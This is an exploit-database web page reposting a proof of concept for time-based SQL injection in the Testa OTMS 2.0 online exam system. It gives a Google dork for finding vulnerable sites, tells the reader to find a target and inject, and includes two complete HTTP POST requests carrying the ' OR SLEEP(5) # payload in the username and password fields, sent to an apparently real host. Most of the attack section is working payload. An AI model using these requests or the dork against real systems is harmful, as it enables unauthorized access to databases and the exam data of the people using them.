Advertisement






Testa OTMS 2.0 - Online Test Management System - 'uname','pass' Time Based SQL I

CVE Category Price Severity
N/A CWE-89 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2020-07-30
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070143

Below is a copy:

Testa OTMS 2.0 - Online Test Management System - 'uname','pass' Time Based SQL Injection
# Exploit Title: Testa OTMS 2.0 - Online Test Management System - 'uname','pass' Time Based SQL Injection
# Date: 2020-07-21
# Google Dork: intitle:Testa - Online Test Management System
# Exploit Author: Ultra Security Team
# Team Members: Ashkan Moghaddas , AmirMohammad Safari , Behzad Khalifeh , Milad Ranjbar
# Vendor Homepage: https://testa.cc
# Version: v2.0 [Final Version]
# Tested on: Windows/Linux
# CVE: N/A


.:: Description ::.
Testa Helps You To Take Online Exams.


.:: Proof Of Concept (PoC) ::.
Step 1 - Find Your Target Using Testa OTMS - Online Test Management System.
Step 2 - You Can Inject Your Payload on Username and Password Field.


.:: Sample Request For Username Field ::.
POST /test/index.php HTTP/1.1
Host: aradet.ir
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://aradet.ir/test/?test_id=3
Cookie: PHPSESSID=pu4viscmtfuvcvmojrf0ak23k4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 63

uname=Test' OR SLEEP(5) #&pass=Test&reg=&test_id=3&B1=%D9%88%D8%B1%D9%88%D8%AF


.:: Sample Request For Username Field ::.
POST /test/index.php HTTP/1.1
Host: aradet.ir
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://aradet.ir/test/?test_id=3
Cookie: PHPSESSID=pu4viscmtfuvcvmojrf0ak23k4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 78

uname=Test&pass=Test' OR SLEEP(5) #&reg=&test_id=3&B1=%D9%88%D8%B1%D9%88%D8%AF

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum